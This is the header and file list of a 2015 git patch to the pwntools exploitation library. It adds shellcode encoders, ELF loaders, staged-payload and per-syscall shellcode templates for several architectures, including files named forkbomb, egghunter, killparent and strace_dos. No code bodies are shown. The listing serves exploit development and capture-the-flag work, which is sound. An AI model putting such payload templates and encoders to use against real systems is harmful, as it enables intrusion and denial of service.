From 11fa0d8d6d55eae5d8e9cb39f050f4f07217b5fe Mon Sep 17 00:00:00 2001 
From: Zach Riggle Date: Tue, 11 Aug 2015 16:55:27 -0400 Subject: [PATCH] This contains a large merge from the Samurai internal repo. Changes: - `pwn/init` initialization code simplified, and some was moved to `pwnlib/args` - `scramble` script added to `pwnlib.commandline`; support for encoders added to relevant scripts - Added shellcode encoders for several architectures - Added CGC architecture shellcode and constants - Added Shellcraft templates for every syscall - Added `xor_key` helper for generating a 4-byte XOR key for a data stream - Added `getdents` for use with the relevant shellcraft scripts - Add ELF loaders for all architectures - Lots of MIPS and AArch64 shellcode --- .travis.yml | 1 + docs/source/conf.py | 2 + docs/source/shellcraft/thumb.rst | 2 +- pwn/__init__.py | 81 +--- pwn/toplevel.py | 2 + pwnlib/__init__.py | 1 + pwnlib/abi.py | 107 +---- pwnlib/args.py | 112 +++++ pwnlib/asm.py | 30 +- pwnlib/commandline/asm.py | 34 +- pwnlib/commandline/common.py | 4 +- pwnlib/commandline/constgrep.py | 4 +- pwnlib/commandline/elfdiff.py | 22 +- pwnlib/commandline/pwnstrip.py | 53 ++ pwnlib/commandline/scramble.py | 103 ++++ pwnlib/commandline/shellcraft.py | 79 ++- pwnlib/constants/cgc/__init__.py | 0 pwnlib/constants/cgc/aarch64.py | 1 + pwnlib/constants/cgc/alpha.py | 1 + pwnlib/constants/cgc/amd64.py | 1 + pwnlib/constants/cgc/arm.py | 1 + pwnlib/constants/cgc/i386.py | 1 + pwnlib/constants/cgc/ia64.py | 1 + pwnlib/constants/cgc/mips.py | 1 + pwnlib/constants/cgc/powerpc.py | 1 + pwnlib/constants/cgc/powerpc64.py | 1 + pwnlib/constants/cgc/s390.py | 1 + pwnlib/constants/cgc/s390x.py | 1 + pwnlib/constants/cgc/sparc.py | 1 + pwnlib/constants/cgc/sparc64.py | 1 + pwnlib/constants/cgc/thumb.py | 28 ++ pwnlib/context/__init__.py | 20 +- pwnlib/data/includes/cgc/aarch64.h | 1 + pwnlib/data/includes/cgc/alpha.h | 1 + pwnlib/data/includes/cgc/amd64.h | 1 + pwnlib/data/includes/cgc/arm.h | 21 + pwnlib/data/includes/cgc/i386.h | 1 + 
pwnlib/data/includes/cgc/ia64.h | 1 + pwnlib/data/includes/cgc/mips.h | 1 + pwnlib/data/includes/cgc/powerpc.h | 1 + pwnlib/data/includes/cgc/powerpc64.h | 1 + pwnlib/data/includes/cgc/s390.h | 1 + pwnlib/data/includes/cgc/s390x.h | 1 + pwnlib/data/includes/cgc/sparc.h | 1 + pwnlib/data/includes/cgc/sparc64.h | 1 + pwnlib/data/includes/cgc/thumb.h | 1 + pwnlib/dynelf.py | 8 + pwnlib/encoders/__init__.py | 9 +- pwnlib/encoders/amd64/__init__.py | 1 + pwnlib/encoders/amd64/delta.py | 42 ++ pwnlib/encoders/arm/__init__.py | 2 + .../arm/alphanumeric/ARM_Instructions.py | 139 ++++++ pwnlib/encoders/arm/alphanumeric/__init__.py | 47 ++ .../arm/alphanumeric/alphanum_byte.py | 49 ++ .../encoders/arm/alphanumeric/alphanumeric.py | 0 pwnlib/encoders/arm/alphanumeric/builder.py | 454 ++++++++++++++++++ .../encoders/arm/alphanumeric/random_funcs.py | 36 ++ pwnlib/encoders/arm/xor.py | 55 +++ pwnlib/encoders/i386/__init__.py | 1 + pwnlib/encoders/i386/delta.py | 79 +++ pwnlib/encoders/mips/__init__.py | 1 + pwnlib/encoders/mips/xor.py | 135 ++++++ pwnlib/gdb.py | 26 +- pwnlib/lexer.py | 3 +- pwnlib/regsort.py | 30 +- pwnlib/rop/srop.py | 12 +- pwnlib/shellcraft/__init__.py | 23 + pwnlib/shellcraft/internal.py | 15 +- pwnlib/shellcraft/registers.py | 63 ++- pwnlib/shellcraft/templates/aarch64/__doc__ | 0 .../shellcraft/templates/aarch64/infloop.asm | 5 + .../templates/aarch64/linux/__doc__ | 0 .../templates/aarch64/linux/accept.asm | 15 + .../templates/aarch64/linux/access.asm | 14 + .../templates/aarch64/linux/acct.asm | 13 + .../templates/aarch64/linux/alarm.asm | 13 + .../templates/aarch64/linux/bind.asm | 15 + .../templates/aarch64/linux/brk.asm | 13 + .../templates/aarch64/linux/cat.asm | 18 + .../templates/aarch64/linux/chdir.asm | 13 + .../templates/aarch64/linux/chmod.asm | 14 + .../templates/aarch64/linux/chown.asm | 15 + .../templates/aarch64/linux/chroot.asm | 13 + .../templates/aarch64/linux/clock_getres.asm | 14 + .../templates/aarch64/linux/clock_gettime.asm | 14 + 
.../aarch64/linux/clock_nanosleep.asm | 16 + .../templates/aarch64/linux/clock_settime.asm | 14 + .../templates/aarch64/linux/clone.asm | 17 + .../templates/aarch64/linux/close.asm | 13 + .../templates/aarch64/linux/connect.asm | 26 + .../templates/aarch64/linux/creat.asm | 14 + .../templates/aarch64/linux/dup.asm | 13 + .../templates/aarch64/linux/dup2.asm | 14 + .../templates/aarch64/linux/dup3.asm | 15 + .../templates/aarch64/linux/echo.asm | 14 + .../templates/aarch64/linux/epoll_create.asm | 13 + .../templates/aarch64/linux/epoll_create1.asm | 13 + .../templates/aarch64/linux/epoll_ctl.asm | 16 + .../templates/aarch64/linux/epoll_pwait.asm | 17 + .../templates/aarch64/linux/epoll_wait.asm | 16 + .../templates/aarch64/linux/execve.asm | 15 + .../templates/aarch64/linux/exit.asm | 13 + .../templates/aarch64/linux/faccessat.asm | 16 + .../templates/aarch64/linux/fallocate.asm | 16 + .../templates/aarch64/linux/fchdir.asm | 13 + .../templates/aarch64/linux/fchmod.asm | 14 + .../templates/aarch64/linux/fchmodat.asm | 16 + .../templates/aarch64/linux/fchown.asm | 15 + .../templates/aarch64/linux/fchownat.asm | 17 + .../templates/aarch64/linux/fcntl.asm | 15 + .../templates/aarch64/linux/fdatasync.asm | 13 + .../templates/aarch64/linux/flock.asm | 14 + .../templates/aarch64/linux/fork.asm | 13 + .../templates/aarch64/linux/forkexit.asm | 16 + .../templates/aarch64/linux/fstat.asm | 14 + .../templates/aarch64/linux/fstat64.asm | 14 + .../templates/aarch64/linux/fstatat64.asm | 16 + .../templates/aarch64/linux/fsync.asm | 13 + .../templates/aarch64/linux/ftruncate.asm | 14 + .../templates/aarch64/linux/ftruncate64.asm | 14 + .../templates/aarch64/linux/futimesat.asm | 15 + .../templates/aarch64/linux/getcwd.asm | 14 + .../templates/aarch64/linux/getegid.asm | 13 + .../templates/aarch64/linux/geteuid.asm | 13 + .../templates/aarch64/linux/getgid.asm | 13 + .../templates/aarch64/linux/getgroups.asm | 14 + .../templates/aarch64/linux/getitimer.asm | 14 + 
.../templates/aarch64/linux/getpeername.asm | 15 + .../templates/aarch64/linux/getpgid.asm | 13 + .../templates/aarch64/linux/getpgrp.asm | 13 + .../templates/aarch64/linux/getpid.asm | 13 + .../templates/aarch64/linux/getpmsg.asm | 17 + .../templates/aarch64/linux/getppid.asm | 13 + .../templates/aarch64/linux/getpriority.asm | 14 + .../templates/aarch64/linux/getresgid.asm | 15 + .../templates/aarch64/linux/getresuid.asm | 15 + .../templates/aarch64/linux/getrlimit.asm | 14 + .../templates/aarch64/linux/getrusage.asm | 14 + .../templates/aarch64/linux/getsid.asm | 13 + .../templates/aarch64/linux/getsockname.asm | 15 + .../templates/aarch64/linux/getsockopt.asm | 17 + .../templates/aarch64/linux/gettimeofday.asm | 14 + .../templates/aarch64/linux/getuid.asm | 13 + .../templates/aarch64/linux/gtty.asm | 14 + .../templates/aarch64/linux/ioctl.asm | 15 + .../templates/aarch64/linux/ioperm.asm | 15 + .../templates/aarch64/linux/iopl.asm | 13 + .../templates/aarch64/linux/kill.asm | 14 + .../templates/aarch64/linux/lchown.asm | 15 + .../templates/aarch64/linux/link.asm | 14 + .../templates/aarch64/linux/linkat.asm | 17 + .../templates/aarch64/linux/listen.asm | 14 + .../templates/aarch64/linux/loader.asm | 183 +++++++ .../templates/aarch64/linux/loader_append.asm | 54 +++ .../templates/aarch64/linux/lseek.asm | 15 + .../templates/aarch64/linux/lstat.asm | 14 + .../templates/aarch64/linux/lstat64.asm | 14 + .../templates/aarch64/linux/madvise.asm | 15 + .../templates/aarch64/linux/mincore.asm | 15 + .../templates/aarch64/linux/mkdir.asm | 14 + .../templates/aarch64/linux/mkdirat.asm | 15 + .../templates/aarch64/linux/mknod.asm | 15 + .../templates/aarch64/linux/mknodat.asm | 16 + .../templates/aarch64/linux/mlock.asm | 14 + .../templates/aarch64/linux/mlockall.asm | 13 + .../templates/aarch64/linux/mmap.asm | 18 + .../templates/aarch64/linux/mprotect.asm | 15 + .../templates/aarch64/linux/mq_notify.asm | 14 + .../templates/aarch64/linux/mq_open.asm | 15 + 
.../aarch64/linux/mq_timedreceive.asm | 17 + .../templates/aarch64/linux/mq_timedsend.asm | 17 + .../templates/aarch64/linux/mq_unlink.asm | 13 + .../templates/aarch64/linux/mremap.asm | 17 + .../templates/aarch64/linux/msync.asm | 15 + .../templates/aarch64/linux/munlock.asm | 14 + .../templates/aarch64/linux/munlockall.asm | 13 + .../templates/aarch64/linux/munmap.asm | 14 + .../templates/aarch64/linux/nanosleep.asm | 14 + .../templates/aarch64/linux/nice.asm | 13 + .../templates/aarch64/linux/open.asm | 15 + .../templates/aarch64/linux/openat.asm | 16 + .../templates/aarch64/linux/pause.asm | 13 + .../templates/aarch64/linux/pipe.asm | 13 + .../templates/aarch64/linux/pipe2.asm | 14 + .../templates/aarch64/linux/poll.asm | 15 + .../templates/aarch64/linux/ppoll.asm | 16 + .../templates/aarch64/linux/prctl.asm | 14 + .../templates/aarch64/linux/pread.asm | 16 + .../templates/aarch64/linux/preadv.asm | 16 + .../templates/aarch64/linux/prlimit64.asm | 16 + .../templates/aarch64/linux/profil.asm | 16 + .../templates/aarch64/linux/ptrace.asm | 14 + .../templates/aarch64/linux/putpmsg.asm | 17 + .../templates/aarch64/linux/pwrite.asm | 16 + .../templates/aarch64/linux/pwritev.asm | 16 + .../templates/aarch64/linux/read.asm | 15 + .../templates/aarch64/linux/readahead.asm | 15 + .../templates/aarch64/linux/readdir.asm | 13 + .../templates/aarch64/linux/readlink.asm | 15 + .../templates/aarch64/linux/readlinkat.asm | 16 + .../templates/aarch64/linux/readn.asm | 23 + .../templates/aarch64/linux/readv.asm | 15 + .../templates/aarch64/linux/recv.asm | 16 + .../templates/aarch64/linux/recvfrom.asm | 18 + .../templates/aarch64/linux/recvmmsg.asm | 17 + .../templates/aarch64/linux/recvmsg.asm | 15 + .../aarch64/linux/remap_file_pages.asm | 17 + .../templates/aarch64/linux/rename.asm | 14 + .../templates/aarch64/linux/renameat.asm | 16 + .../templates/aarch64/linux/rmdir.asm | 13 + .../aarch64/linux/sched_get_priority_max.asm | 13 + .../aarch64/linux/sched_get_priority_min.asm 
| 13 + .../aarch64/linux/sched_getaffinity.asm | 15 + .../aarch64/linux/sched_getparam.asm | 14 + .../aarch64/linux/sched_getscheduler.asm | 13 + .../aarch64/linux/sched_rr_get_interval.asm | 14 + .../aarch64/linux/sched_setaffinity.asm | 15 + .../aarch64/linux/sched_setparam.asm | 14 + .../aarch64/linux/sched_setscheduler.asm | 15 + .../templates/aarch64/linux/sched_yield.asm | 13 + .../templates/aarch64/linux/select.asm | 17 + .../templates/aarch64/linux/sendfile.asm | 16 + .../templates/aarch64/linux/sendfile64.asm | 16 + .../templates/aarch64/linux/setdomainname.asm | 14 + .../templates/aarch64/linux/setgid.asm | 13 + .../templates/aarch64/linux/setgroups.asm | 14 + .../templates/aarch64/linux/sethostname.asm | 14 + .../templates/aarch64/linux/setitimer.asm | 15 + .../templates/aarch64/linux/setpgid.asm | 14 + .../templates/aarch64/linux/setpriority.asm | 15 + .../templates/aarch64/linux/setregid.asm | 14 + .../templates/aarch64/linux/setresgid.asm | 15 + .../templates/aarch64/linux/setresuid.asm | 15 + .../templates/aarch64/linux/setreuid.asm | 14 + .../templates/aarch64/linux/setrlimit.asm | 14 + .../templates/aarch64/linux/setsid.asm | 13 + .../templates/aarch64/linux/setsockopt.asm | 17 + .../aarch64/linux/setsockopt_timeout.asm | 19 + .../templates/aarch64/linux/settimeofday.asm | 14 + .../templates/aarch64/linux/setuid.asm | 13 + .../templates/aarch64/linux/sigaction.asm | 15 + .../templates/aarch64/linux/sigaltstack.asm | 14 + .../templates/aarch64/linux/signal.asm | 14 + .../templates/aarch64/linux/sigpending.asm | 13 + .../templates/aarch64/linux/sigprocmask.asm | 16 + .../templates/aarch64/linux/sigreturn.asm | 10 + .../templates/aarch64/linux/sigsuspend.asm | 13 + .../templates/aarch64/linux/socket.asm | 16 + .../templates/aarch64/linux/splice.asm | 18 + .../templates/aarch64/linux/stage.asm | 61 +++ .../templates/aarch64/linux/stat.asm | 14 + .../templates/aarch64/linux/stat64.asm | 14 + .../templates/aarch64/linux/stime.asm | 13 + 
.../templates/aarch64/linux/stty.asm | 14 + .../templates/aarch64/linux/symlink.asm | 14 + .../templates/aarch64/linux/symlinkat.asm | 15 + .../templates/aarch64/linux/sync.asm | 13 + .../aarch64/linux/sync_file_range.asm | 16 + .../templates/aarch64/linux/syscall.asm | 57 +++ .../templates/aarch64/linux/syslog.asm | 15 + .../templates/aarch64/linux/tee.asm | 16 + .../templates/aarch64/linux/time.asm | 13 + .../templates/aarch64/linux/timer_create.asm | 15 + .../templates/aarch64/linux/timer_delete.asm | 13 + .../aarch64/linux/timer_getoverrun.asm | 13 + .../templates/aarch64/linux/timer_gettime.asm | 14 + .../templates/aarch64/linux/timer_settime.asm | 16 + .../templates/aarch64/linux/truncate.asm | 14 + .../templates/aarch64/linux/truncate64.asm | 14 + .../templates/aarch64/linux/ulimit.asm | 14 + .../templates/aarch64/linux/umask.asm | 13 + .../templates/aarch64/linux/uname.asm | 13 + .../templates/aarch64/linux/unlink.asm | 13 + .../templates/aarch64/linux/unlinkat.asm | 15 + .../templates/aarch64/linux/unshare.asm | 13 + .../templates/aarch64/linux/ustat.asm | 14 + .../templates/aarch64/linux/utime.asm | 14 + .../templates/aarch64/linux/utimensat.asm | 16 + .../templates/aarch64/linux/utimes.asm | 14 + .../templates/aarch64/linux/vfork.asm | 13 + .../templates/aarch64/linux/vhangup.asm | 13 + .../templates/aarch64/linux/vmsplice.asm | 16 + .../templates/aarch64/linux/wait4.asm | 16 + .../templates/aarch64/linux/waitid.asm | 16 + .../templates/aarch64/linux/waitpid.asm | 15 + .../templates/aarch64/linux/write.asm | 15 + .../templates/aarch64/linux/writev.asm | 15 + pwnlib/shellcraft/templates/aarch64/mov.asm | 108 +++++ .../shellcraft/templates/aarch64/pushstr.asm | 54 +++ .../shellcraft/templates/aarch64/setregs.asm | 43 ++ pwnlib/shellcraft/templates/aarch64/xor.asm | 67 +++ pwnlib/shellcraft/templates/amd64/crash.asm | 13 + pwnlib/shellcraft/templates/amd64/itoa.asm | 60 +++ .../templates/amd64/linux/accept.asm | 15 + .../templates/amd64/linux/access.asm | 
14 + .../shellcraft/templates/amd64/linux/acct.asm | 13 + .../templates/amd64/linux/alarm.asm | 13 + .../shellcraft/templates/amd64/linux/bind.asm | 15 + .../shellcraft/templates/amd64/linux/brk.asm | 13 + .../templates/amd64/linux/chdir.asm | 13 + .../templates/amd64/linux/chmod.asm | 14 + .../templates/amd64/linux/chown.asm | 15 + .../templates/amd64/linux/chroot.asm | 13 + .../templates/amd64/linux/clock_getres.asm | 14 + .../templates/amd64/linux/clock_gettime.asm | 14 + .../templates/amd64/linux/clock_nanosleep.asm | 16 + .../templates/amd64/linux/clock_settime.asm | 14 + .../templates/amd64/linux/clone.asm | 17 + .../templates/amd64/linux/close.asm | 13 + .../templates/amd64/linux/connect.asm | 19 +- .../templates/amd64/linux/creat.asm | 14 + .../shellcraft/templates/amd64/linux/dup2.asm | 14 + .../shellcraft/templates/amd64/linux/dup3.asm | 15 + .../shellcraft/templates/amd64/linux/echo.asm | 2 +- .../templates/amd64/linux/egghunter.asm | 73 +++ .../templates/amd64/linux/epoll_create.asm | 13 + .../templates/amd64/linux/epoll_create1.asm | 13 + .../templates/amd64/linux/epoll_ctl.asm | 16 + .../templates/amd64/linux/epoll_pwait.asm | 17 + .../templates/amd64/linux/epoll_wait.asm | 16 + .../templates/amd64/linux/execve.asm | 51 ++ .../templates/amd64/linux/faccessat.asm | 16 + .../templates/amd64/linux/fallocate.asm | 16 + .../templates/amd64/linux/fchdir.asm | 13 + .../templates/amd64/linux/fchmod.asm | 14 + .../templates/amd64/linux/fchmodat.asm | 16 + .../templates/amd64/linux/fchown.asm | 15 + .../templates/amd64/linux/fchownat.asm | 17 + .../templates/amd64/linux/fcntl.asm | 15 + .../templates/amd64/linux/fdatasync.asm | 13 + .../templates/amd64/linux/flock.asm | 14 + .../shellcraft/templates/amd64/linux/fork.asm | 13 + .../templates/amd64/linux/forkbomb.asm | 13 + .../templates/amd64/linux/forkexit.asm | 16 + .../templates/amd64/linux/fstat.asm | 14 + .../templates/amd64/linux/fstat64.asm | 14 + .../templates/amd64/linux/fstatat64.asm | 16 + 
.../templates/amd64/linux/fsync.asm | 13 + .../templates/amd64/linux/ftruncate.asm | 14 + .../templates/amd64/linux/ftruncate64.asm | 14 + .../templates/amd64/linux/futimesat.asm | 15 + .../templates/amd64/linux/getcwd.asm | 14 + .../templates/amd64/linux/getegid.asm | 13 + .../templates/amd64/linux/geteuid.asm | 13 + .../templates/amd64/linux/getgid.asm | 13 + .../templates/amd64/linux/getgroups.asm | 14 + .../templates/amd64/linux/getitimer.asm | 14 + .../templates/amd64/linux/getpeername.asm | 15 + .../templates/amd64/linux/getpgid.asm | 13 + .../templates/amd64/linux/getpgrp.asm | 13 + .../templates/amd64/linux/getpid.asm | 4 + .../templates/amd64/linux/getpmsg.asm | 17 + .../templates/amd64/linux/getppid.asm | 13 + .../templates/amd64/linux/getpriority.asm | 14 + .../templates/amd64/linux/getresgid.asm | 15 + .../templates/amd64/linux/getresuid.asm | 15 + .../templates/amd64/linux/getrlimit.asm | 14 + .../templates/amd64/linux/getrusage.asm | 14 + .../templates/amd64/linux/getsid.asm | 13 + .../templates/amd64/linux/getsockname.asm | 15 + .../templates/amd64/linux/getsockopt.asm | 17 + .../templates/amd64/linux/gettimeofday.asm | 14 + .../templates/amd64/linux/getuid.asm | 13 + .../shellcraft/templates/amd64/linux/gtty.asm | 14 + .../templates/amd64/linux/ioctl.asm | 15 + .../templates/amd64/linux/ioperm.asm | 15 + .../shellcraft/templates/amd64/linux/iopl.asm | 13 + .../shellcraft/templates/amd64/linux/kill.asm | 5 + .../templates/amd64/linux/killparent.asm | 17 + .../templates/amd64/linux/lchown.asm | 15 + .../shellcraft/templates/amd64/linux/link.asm | 14 + .../templates/amd64/linux/linkat.asm | 17 + .../templates/amd64/linux/loader.asm | 221 +++++++++ .../templates/amd64/linux/loader_append.asm | 55 +++ .../templates/amd64/linux/lseek.asm | 15 + .../templates/amd64/linux/lstat.asm | 14 + .../templates/amd64/linux/lstat64.asm | 14 + .../templates/amd64/linux/madvise.asm | 15 + .../templates/amd64/linux/membot.asm | 48 ++ 
.../templates/amd64/linux/migrate_stack.asm | 8 + .../templates/amd64/linux/mincore.asm | 15 + .../templates/amd64/linux/mkdir.asm | 14 + .../templates/amd64/linux/mkdirat.asm | 15 + .../templates/amd64/linux/mknod.asm | 15 + .../templates/amd64/linux/mknodat.asm | 16 + .../templates/amd64/linux/mlock.asm | 14 + .../templates/amd64/linux/mlockall.asm | 13 + .../shellcraft/templates/amd64/linux/mmap.asm | 17 + .../templates/amd64/linux/mmap_rwx.asm | 11 + .../shellcraft/templates/amd64/linux/mov.asm | 22 +- .../templates/amd64/linux/mprotect.asm | 15 + .../templates/amd64/linux/mq_notify.asm | 14 + .../templates/amd64/linux/mq_open.asm | 15 + .../templates/amd64/linux/mq_timedreceive.asm | 17 + .../templates/amd64/linux/mq_timedsend.asm | 17 + .../templates/amd64/linux/mq_unlink.asm | 13 + .../templates/amd64/linux/mremap.asm | 17 + .../templates/amd64/linux/msync.asm | 15 + .../templates/amd64/linux/munlock.asm | 14 + .../templates/amd64/linux/munlockall.asm | 13 + .../templates/amd64/linux/munmap.asm | 14 + .../templates/amd64/linux/nanosleep.asm | 14 + .../shellcraft/templates/amd64/linux/nice.asm | 13 + .../shellcraft/templates/amd64/linux/open.asm | 15 + .../templates/amd64/linux/openat.asm | 16 + .../templates/amd64/linux/pause.asm | 13 + .../shellcraft/templates/amd64/linux/pipe.asm | 13 + .../templates/amd64/linux/pipe2.asm | 14 + .../shellcraft/templates/amd64/linux/poll.asm | 15 + .../templates/amd64/linux/ppoll.asm | 16 + .../templates/amd64/linux/prctl.asm | 14 + .../templates/amd64/linux/pread.asm | 16 + .../templates/amd64/linux/preadv.asm | 16 + .../templates/amd64/linux/prlimit64.asm | 16 + .../templates/amd64/linux/profil.asm | 16 + .../templates/amd64/linux/ptrace.asm | 14 + .../shellcraft/templates/amd64/linux/push.asm | 22 +- .../templates/amd64/linux/putpmsg.asm | 17 + .../templates/amd64/linux/pwrite.asm | 16 + .../templates/amd64/linux/pwritev.asm | 16 + .../shellcraft/templates/amd64/linux/read.asm | 17 +- 
.../templates/amd64/linux/read_upto.asm | 6 + .../templates/amd64/linux/readahead.asm | 15 + .../templates/amd64/linux/readdir.asm | 13 + .../templates/amd64/linux/readinto.asm | 22 + .../templates/amd64/linux/readlink.asm | 15 + .../templates/amd64/linux/readlinkat.asm | 16 + .../templates/amd64/linux/readloop.asm | 25 + .../templates/amd64/linux/readn.asm | 23 + .../templates/amd64/linux/readptr.asm | 7 + .../templates/amd64/linux/readv.asm | 15 + .../shellcraft/templates/amd64/linux/recv.asm | 16 + .../templates/amd64/linux/recvfrom.asm | 18 + .../templates/amd64/linux/recvmmsg.asm | 17 + .../templates/amd64/linux/recvmsg.asm | 15 + .../amd64/linux/remap_file_pages.asm | 17 + .../templates/amd64/linux/rename.asm | 14 + .../templates/amd64/linux/renameat.asm | 16 + .../templates/amd64/linux/rmdir.asm | 13 + .../amd64/linux/sched_get_priority_max.asm | 13 + .../amd64/linux/sched_get_priority_min.asm | 13 + .../amd64/linux/sched_getaffinity.asm | 15 + .../templates/amd64/linux/sched_getparam.asm | 14 + .../amd64/linux/sched_getscheduler.asm | 13 + .../amd64/linux/sched_rr_get_interval.asm | 14 + .../amd64/linux/sched_setaffinity.asm | 15 + .../templates/amd64/linux/sched_setparam.asm | 14 + .../amd64/linux/sched_setscheduler.asm | 15 + .../templates/amd64/linux/sched_yield.asm | 13 + .../templates/amd64/linux/select.asm | 17 + .../templates/amd64/linux/sendfile.asm | 16 + .../templates/amd64/linux/sendfile64.asm | 16 + .../templates/amd64/linux/setdomainname.asm | 14 + .../templates/amd64/linux/setgid.asm | 13 + .../templates/amd64/linux/setgroups.asm | 14 + .../templates/amd64/linux/sethostname.asm | 14 + .../templates/amd64/linux/setitimer.asm | 15 + .../templates/amd64/linux/setpgid.asm | 14 + .../templates/amd64/linux/setpriority.asm | 15 + .../templates/amd64/linux/setresgid.asm | 15 + .../templates/amd64/linux/setresuid.asm | 15 + .../templates/amd64/linux/setrlimit.asm | 14 + .../templates/amd64/linux/setsid.asm | 13 + 
.../templates/amd64/linux/setsockopt.asm | 17 + .../amd64/linux/setsockopt_timeout.asm | 19 + .../templates/amd64/linux/settimeofday.asm | 14 + .../templates/amd64/linux/setuid.asm | 13 + .../shellcraft/templates/amd64/linux/sh.asm | 11 +- .../templates/amd64/linux/sigaction.asm | 15 + .../templates/amd64/linux/sigaltstack.asm | 14 + .../templates/amd64/linux/signal.asm | 14 + .../templates/amd64/linux/sigpending.asm | 13 + .../templates/amd64/linux/sigprocmask.asm | 16 + .../templates/amd64/linux/sigreturn.asm | 4 +- .../templates/amd64/linux/sigsuspend.asm | 13 + .../templates/amd64/linux/socket.asm | 16 + .../templates/amd64/linux/splice.asm | 18 + .../templates/amd64/linux/stage.asm | 58 +++ .../shellcraft/templates/amd64/linux/stat.asm | 14 + .../templates/amd64/linux/stat64.asm | 14 + .../templates/amd64/linux/stime.asm | 13 + .../templates/amd64/linux/strace_dos.asm | 40 ++ .../shellcraft/templates/amd64/linux/stty.asm | 14 + .../templates/amd64/linux/symlink.asm | 14 + .../templates/amd64/linux/symlinkat.asm | 15 + .../shellcraft/templates/amd64/linux/sync.asm | 13 + .../templates/amd64/linux/sync_file_range.asm | 16 + .../templates/amd64/linux/syscall.asm | 72 ++- .../templates/amd64/linux/syslog.asm | 15 + .../shellcraft/templates/amd64/linux/tee.asm | 16 + .../shellcraft/templates/amd64/linux/time.asm | 13 + .../templates/amd64/linux/timer_create.asm | 15 + .../templates/amd64/linux/timer_delete.asm | 13 + .../amd64/linux/timer_getoverrun.asm | 13 + .../templates/amd64/linux/timer_gettime.asm | 14 + .../templates/amd64/linux/timer_settime.asm | 16 + .../templates/amd64/linux/truncate.asm | 14 + .../templates/amd64/linux/truncate64.asm | 14 + .../templates/amd64/linux/ulimit.asm | 14 + .../templates/amd64/linux/umask.asm | 13 + .../templates/amd64/linux/uname.asm | 13 + .../templates/amd64/linux/unlink.asm | 13 + .../templates/amd64/linux/unlinkat.asm | 15 + .../templates/amd64/linux/unshare.asm | 13 + .../templates/amd64/linux/ustat.asm | 14 + 
.../templates/amd64/linux/utime.asm | 14 + .../templates/amd64/linux/utimensat.asm | 16 + .../templates/amd64/linux/utimes.asm | 14 + .../templates/amd64/linux/vfork.asm | 13 + .../templates/amd64/linux/vhangup.asm | 13 + .../templates/amd64/linux/vmsplice.asm | 16 + .../templates/amd64/linux/wait4.asm | 16 + .../templates/amd64/linux/waitid.asm | 16 + .../templates/amd64/linux/waitpid.asm | 15 + .../templates/amd64/linux/write.asm | 15 + .../templates/amd64/linux/writeloop.asm | 25 + .../templates/amd64/linux/writev.asm | 15 + pwnlib/shellcraft/templates/amd64/memcpy.asm | 13 + pwnlib/shellcraft/templates/amd64/mov.asm | 82 ++-- pwnlib/shellcraft/templates/amd64/popad.asm | 13 + pwnlib/shellcraft/templates/amd64/push.asm | 25 +- pwnlib/shellcraft/templates/amd64/pushad.asm | 13 + pwnlib/shellcraft/templates/amd64/pushstr.asm | 47 +- .../templates/amd64/pushstr_array.asm | 38 ++ pwnlib/shellcraft/templates/amd64/setregs.asm | 45 +- pwnlib/shellcraft/templates/amd64/strcpy.asm | 32 ++ pwnlib/shellcraft/templates/amd64/strlen.asm | 35 ++ pwnlib/shellcraft/templates/amd64/xor.asm | 82 ++++ pwnlib/shellcraft/templates/arm/crash.asm | 12 + pwnlib/shellcraft/templates/arm/itoa.asm | 75 +++ .../shellcraft/templates/arm/linux/accept.asm | 15 + .../shellcraft/templates/arm/linux/access.asm | 14 + .../shellcraft/templates/arm/linux/acct.asm | 13 + .../shellcraft/templates/arm/linux/alarm.asm | 13 + .../shellcraft/templates/arm/linux/bind.asm | 15 + pwnlib/shellcraft/templates/arm/linux/brk.asm | 13 + .../templates/arm/linux/cacheflush.asm | 31 ++ pwnlib/shellcraft/templates/arm/linux/cat.asm | 19 + .../shellcraft/templates/arm/linux/chdir.asm | 13 + .../shellcraft/templates/arm/linux/chmod.asm | 14 + .../shellcraft/templates/arm/linux/chown.asm | 15 + .../shellcraft/templates/arm/linux/chroot.asm | 13 + .../templates/arm/linux/clock_getres.asm | 14 + .../templates/arm/linux/clock_gettime.asm | 14 + .../templates/arm/linux/clock_nanosleep.asm | 16 + 
.../templates/arm/linux/clock_settime.asm | 14 + .../shellcraft/templates/arm/linux/clone.asm | 17 + .../shellcraft/templates/arm/linux/close.asm | 13 + .../templates/arm/linux/connect.asm | 26 + .../shellcraft/templates/arm/linux/creat.asm | 14 + pwnlib/shellcraft/templates/arm/linux/dir.asm | 21 + pwnlib/shellcraft/templates/arm/linux/dup.asm | 13 + .../shellcraft/templates/arm/linux/dup2.asm | 14 + .../shellcraft/templates/arm/linux/dup3.asm | 15 + .../shellcraft/templates/arm/linux/echo.asm | 14 + .../templates/arm/linux/epoll_create.asm | 13 + .../templates/arm/linux/epoll_create1.asm | 13 + .../templates/arm/linux/epoll_ctl.asm | 16 + .../templates/arm/linux/epoll_pwait.asm | 17 + .../templates/arm/linux/epoll_wait.asm | 16 + .../shellcraft/templates/arm/linux/execve.asm | 26 + .../shellcraft/templates/arm/linux/exit.asm | 13 + .../templates/arm/linux/faccessat.asm | 16 + .../templates/arm/linux/fallocate.asm | 16 + .../shellcraft/templates/arm/linux/fchdir.asm | 13 + .../shellcraft/templates/arm/linux/fchmod.asm | 14 + .../templates/arm/linux/fchmodat.asm | 16 + .../shellcraft/templates/arm/linux/fchown.asm | 15 + .../templates/arm/linux/fchownat.asm | 17 + .../shellcraft/templates/arm/linux/fcntl.asm | 15 + .../templates/arm/linux/fdatasync.asm | 13 + .../shellcraft/templates/arm/linux/flock.asm | 14 + .../shellcraft/templates/arm/linux/fork.asm | 13 + .../templates/arm/linux/forkbomb.asm | 13 + .../templates/arm/linux/forkexit.asm | 16 + .../shellcraft/templates/arm/linux/fstat.asm | 14 + .../templates/arm/linux/fstat64.asm | 14 + .../templates/arm/linux/fstatat64.asm | 16 + .../shellcraft/templates/arm/linux/fsync.asm | 13 + .../templates/arm/linux/ftruncate.asm | 14 + .../templates/arm/linux/ftruncate64.asm | 14 + .../templates/arm/linux/futimesat.asm | 15 + .../shellcraft/templates/arm/linux/getcwd.asm | 14 + .../templates/arm/linux/getdents.asm | 14 + .../templates/arm/linux/getegid.asm | 13 + .../templates/arm/linux/geteuid.asm | 13 + 
